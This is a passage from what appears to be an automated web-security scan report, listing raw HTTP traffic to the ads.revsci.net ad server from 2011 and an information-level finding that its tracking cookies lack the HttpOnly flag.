rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjm2oawXHqkUpttbu+TpTQ7/r5k2TkfGHxsBiWalfeAB/i2ZeDVh3sNrEwwJAMx4il/KokORw7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENGDz17XkpjDubHWNj6MzdO20TKeo2ebTm+X/aIFIAjSHwRm25h7faDJboBly37SaRVTJmVSVncsdODBYijyuPYTdFwC03sgxGgMINUQBU941lqVIMhGuSaJnSZ1bjvqoCCRDLRyqJCi6WnVSUpydvqvGWVlBYhxf+2EJFBlcMlHTpZKXGT1HeSqJJiOoXZpr/uvbpKdN1F5nqoIZKyR9HZy2TbKbYnBNFxzgutHbw6zXXppgfBJaWgOtCOMhs/ZZJ3OA1pxSjhPMmisV+EotP7wA2c0D7Io2lBYNXPe+9NRjvYmJrWaYkh2V9cxr+G5/xpyO81WenMWdhNnGRMtQomwCOTzjyZJYxNaLgOUEIIKY/A87ufnJ5qjqqB+BP8joxvEdW3W1Npu2B+Na3ecvL1Hhc5ZC1GBTQF0B1zfcmgxi8UCiZBmR2u4TvNpihWJeHOeADYhYgHy7fOE602RwkvfJpCdu7CgEkl/EapX90ymBIYIqwTRnrIV8fRqLA/JDPUN6wj4Po1l5cmK4VoP0sL52LnFEkGOXjlWFKb/dz4QQVlB3RU1uDB5Q2eyVzyWDhLN6+otEMWxip/DPpeVZFX20gRQOs9ik/EEMEZ5SBlEKXm9E12aY3Lb8xP23GKX6t28Fv8oVf0A9Hzq3RgaRIvYuSeHKg9n7kgHYmsqEC5FNeGc7ov2Rk7IAiVAilbtLgqkH3JaN/btEetkR3e86wQSucxk5aStmOWDZrorIifNpOczosSxBSP3da2SvQWkfJfNRVfxtlhd7qB8LBiXDl2SUm9TMHyJ+KLZ20a5mxC8xN7Om6Kt5yd5T28UAIR5tZznNV/NkyVtt/ytpEiB8NmrJm1LxAnC+RcrDEAr8/agqLZBIx3GTt7wIpqdhFr58Dzg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Tpj7P8STnjz/8LS/qprmdrNu/Wv+Yp2mpP2gxUFQc/rlHGwyyG/2blenQfG1l0Q/iLSgjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5YmY28pH9JqakD06xSknvL5GRJuLPqNluHWRddDf63qduJIoP35MjeUiF+saJEMy/UOMsbiRDD+AqcM3wOeIhml4rFWgSAbj5SiITj5PrU4NK/fHsY65IwlXPMI/pKzvuGuzGzhzcEk1KynD5qCt8jOSkM2oAlc0wx6QlyPfCUZPATyRdNFhEM5y9lsLQ0p8cg4khQHQccUe1bCkkhdhyNLjcJh4RhXA7qtoRmA/3jVPEVUy61DKwIuJLIHRusqJVlbHTumZDnWUlnilqW9jrYlGM4+dhWXAfb4gtdKaz0GKHus33rMTSxatHCCitc45ODJwXHyOzv/BcA6smRRrYOTGGrag2N6reait+mxyihdCmQBnnZYh2AjQyI1DujvXsL5ZBYLhfsRYs+tan3tzYKttQmkwnqlQ4vHKqg6BIgbUvya8t7FHWwzO3V3Q3AcEP9oXSVv6oMtWTCV98nh0Alk8ravDhoJbJkk3NhdxtyWNrFELGmL/PNXc1h9zBAY9vEeNFGRkVf2u+Mui0cz5sNGO8Uzy5sT+eHKqO0Lmtn0vA7CspugEbQv/vdjaBRqge2SjgrxVqGBFx82gTqIDlHt06oiisS2tQF5pRZbQrxnMZ5to24HAkZhEcKgWJOBJJBtJr5X5kUPq6xZgyzowadexRLuAcwobZ0FFCxzxOyiPmeJMgbKV8+BMRRwQl7ZZTczcD92zqidoBQxGLupenkFRWHHCzlhmwYSyRBPqEdgyW4BPKRdwlJ3PZul3jLx1PtQ4NRdGHd5YH1BsN0KCa9yZCW9yODwolH/aBISyjfq0mg+ILAD634YEvdwzGwHe6n0NZxKYYZCDhUuKwz9gCXdEuFItH0gBJApTVgbxbVJBw9SYPnDTm20ZnCUGnXDMGOeRjFFIE9e7Z+UWuTTsnHpU0l5prxyTXe7oRSxpEBEk/ZqjaXH2B+6cd+R0f/jFy2EMYm6+pJDwthlUTpRDB0YZ0iUsB/sp3GzuDrmZKUmBcxvnrxfYDmLFGZpcsmlejWoWCCK1ygwfY0CDcigYCPasCONAsMXSSO2PlVZ3X9r+WNc9ZxAhE3kS3bni2yb64gi/FusJre1KWVPFoYCnANej9xGlU/w37shrHplGwwi2CmPIhr8ESop1mEX0CN9mqRhC5UV+837fNG18SC3vWzvuax0/sY9ZAK+vVhycciXqeVl6l2aRvZs5QBtWoIyaTCIIPUqsvFmBAGDmJ+zmYerK9EBYZJt7pp+wasNsfeq8+lJLwmmQvtWOLtWraxYr8ZZ24/BijoxGDUTdTpDpeeWDA6VmccDk+Ah9R/lF9IXZWDidngc8JPc3C7ITqz4YFQjkYRQ+lKF7SX8xQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-mu
...[SNIP]...
10.21. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-75921-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-596291-1044587-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_pcmJ="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjCvxKBGnNieprsaqAEBSpAsXkCPkTX0nxsBiWalfewKcJK8Vc/VW9/VjSEysooOkVzr/RWSQ7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENWF0WHX0pHjFhiyz8iM1hcftVO/mv2Gym6f1ixYIEoxWjZmugIrdOCa6jtlrwynaN2daFJSG+cHccCyeSSyqxFOdB7JO2qgvGJDILfWUHh4m+MSIEwdZyOpUONprjPGRiDXeoV1GN0HGmkDh71ptqIE73Slzx2ocQ3YWHZlgdaSTx6N9Gq1RdiCIjiwCxNpfVfSbErbPGn574X+YJwM0jly8qtYbEd8z2azKrl1r8U2xmmJk1Ut6fe1GyCQFMttbbqeDiSzU461AonI7qdnrF2j/+PzRXsh1X7BAxKCpTl2svSiaq0tTDa0zhuGMZGUOWewfuXATBKa0+HjymcOZXXg8mGLSvVmp/jMUCL6Hycpp8Heq2GfkJqmKJgynAhhT77HToysfn9n/8XqrPP3HCthiRFLZpOOTnBksJffeZmXGUAidwIVT4k0/Gah9U7VbqpOtiSYCYU4Yc8shojQKKPyiHgobQdVoozcpIHrCRoDDB+YGYmEhaulfXopicXxpSijZkV5JDPVmCP0dTfIGUIXXlsIH4QLHr5ybR2AtT29aq9li+t5BiXsqfDEojsRMq/Ygtk6OJvRVFcPu1JfdimNHGlFu87wDQ49K/8wLu5+IjJD8Lia5fRfiCwHyzBRT0tHMUBiPA18FS0OXs+6XYjcEcKIV9D9ynNJiwVb1M8S0L4TrR9L+n8qMcNqdXcvWbUDRQlEyi+nuJrqeeMAqFO5lDH6Opqdvvtxg7VWa6OwiiotH1KPT8awCgQVj9uG6fuofnYz6+ZgvA3nQrZ75NA1GYyZQPCYKxogsGppT39axp+alRTT1DD3DgY+aTnrDH4/x+G6ec/46zILCP5wLT0IyYbruzQ3K1lN0PclKCIGZJV8wEDT67c3S5t+iXoDTDwE"; rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Trj7P+Kw7EY+8nG6l7281jI/Twsp6FvJuxkedavN124ASJwVH5lHOqaC4o2fHK9QkQegr9yV3a1uS0XBRr+UjUJn3jbPtGSbFgtYHM6diK2a0NjjkRkuTSEj1KpKAhX6AZ1R1E/1mhgQQAGO6Ey+i60pJwoxL3P90aEwTDtF60ZrAr2oVSSkT53eZtaPmd04KSPJCji5aopxLklNZS/GiatoZ2jphGx2z1EXHlaH+CR99JCv3peL4/lsLBtiSo+43CIgl+uX+ehgA5bfpaMyTvjWqfMxG+YXpRB7oJvzVfJ1hAJB1fCxIe3BSPIhvIXg5w61OSBX96dEvqaOfQgXdLrYKu2TTqz1r49jDR0udHJkV58ovuVKNAQzYsIUkpudNMqvuS5rii5vasRjCyBbjuTZUI+ke75OMy75W1xZVCyxCOZvMLmxTUJXbZV8GzCE7lMDc3+zvE5V5IvbS5CsrnTj6ybSguJ+omQctAgniJFUozrkBZ1OIl5GLrwquW4JyHLRLAASEkCIgrjlKwH+eTKuYt0xO6ZRLXFJLAYwbNouVUSKXdm1/7rLyVlyqAb6l32+WOPCnh2bleryXHWUjO5ptGRoXtN/XsvNR5nqF5qOnaE7QN47lsTZYheDGqu5vx/TX9i8WWYdAEea18RNQgalGMmpUnwkr0XJxxkS9pOZY+nMDWO9YPnqV4L1M+jNcOrMDy5W7bFAzGFtBsQLQxTBMB8CQhsjSXE8EFGWtYAGcqgQrWLcFUAHv2YstIikpMJAHTcpd//ChyQksxgwRI/xDTP/UX8sl81am2u/l72M+kC3NYxyLlqbMQygHhC5xbzBLAz8uP5C8vlPRfNyTcmE0bjY/a4mx+MRhAyxr6EbW0PRTjcT9i1HqlvgHmTxKMoWqoDQUrJL0iSjFdVid/A10rFa2odEqrwGdImt2VkyF2FkvhrMrEPZ+oemlCYh57OAQpLcngarZUVMEBAbLnzayJNE1icdui+MToGdBHC8eA7SXFoiWvid4PrK32gS7iye9h3wQDCsKNPfiEGx+afiTdHusAdAnDb8v9Rj1kslJs26tYCN4jl0bmJ1JpEKWFHZSQJ/T/aq+8F84c4uJ2mgjExwD8ib+0M+W0SZksWnH/1693rN6KkLzl4u+xkRT9q33JjB7wW0GsiI6E17aBu49cXOoC0HjIZBvQaM9rIoqtmgwjToNtIcg952Cbwvin7A2nXH2BvmVnx4ucA2Wvn0J8cV8hZZDNaDUTbY219bW1E/kMSjSTfnagaQoW1WXUJr21Bl5LZcARkW7d1ksv8v4X3BZps89ZMu/Vz+sNEuFQY4vL6GJK6YPH/0/l8sx1s4x7GPq1/skLvz121KrQObQeVNJb0CkKyIYPH5XBeDt3iXpMBeWLxrFuVx0g7ItcCA+baO+p4dVI0vQ9Zr+V+MRO5Exbcu/249PljXdXc7EPtp9D9+w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdqU="MLsXrqMOJjhroJB0OsFGPziNFPNiuow9UdSaSv9RjdiZuXcB7hqs6EdLVaX9FhqxzXqzJywn1Cj9nLMFQzefSGFEY+rjaCpJRiAiYGi2DHp0tKU8XQcGSHbS+Dk+qovgQTwR+gpKV0oPK0JkzzcKhOF8o7uE6oO9qh80lZ7Xel6NGtgbwjrgJduiM51PaIPd2BJyFdQZAmkNyOhm5cP71nYVyV9KaVPcBA50HnoWW6+k3Dxhr0zTbpCBHUllWtx6aRVDYGeZk9K7ZL0hTHKvncsHLsCLYHCvmD5Ycv7VVDV00zYJINWzu3CPrbB4IYAjXW3vj4rsblu54yLA1Dc6Y6gCuHKV5SZsUi4uGiBdtBhhocEPOnIejFhsR3rbY6GJtx4ihgHWbiCsghdvgegfdGd/5qYgmedE5PSbM1ADhrKGZ3SCY44HJIJRGGazmJrBKNn5LEoHx4MRcKmq7CTYjhtBIgVi8n0cQcFNme1bNmPWFKcqoVnAUSJpJgBqXFQ5wx7qH4gDYPya9+buKMK9+ekcnzt54NYfTnI7jAxwnCpWq+kJd0Yw543TIHZ5i0gxUC/IPGc6mxdWiKg4RHEO3L0ot